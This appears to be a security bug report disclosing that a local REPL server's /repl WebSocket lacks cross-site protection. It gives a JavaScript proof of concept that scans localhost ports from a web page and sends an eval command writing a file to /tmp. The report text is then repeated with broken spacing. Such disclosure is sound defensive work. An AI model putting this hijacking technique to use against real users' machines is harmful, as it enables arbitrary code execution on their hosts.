The websocket at /repl does not seem to be protected against CSRF (or, CSWSH as some like to call it). This allows a malicious website to execute arbitrary code on the host.
PoC:
var ports = [];
var done = false;
for (var i = 10000; i < 65535; i++) {
ports.push(i);
}
function spawn() {
if (done || ports.length < 1)
return;
var port = ports.pop();
var ws = new WebSocket("ws://localhost:" + port + "/repl");
ws.onerror = spawn;
ws.onopen = function() {
done = true;
console.log("Connected");
ws.send(JSON.stringify({"op": "eval", "code": "(spit \"/tmp/file\" \"evil!\")" }))
}
}
for (var i = 0; i < 200; i++) {
spawn();
}
The websocket at
/repldoes not seem to be protected against CSRF (or, CSWSH as some like to call it). This allows a malicious website to execute arbitrary code on the host.PoC: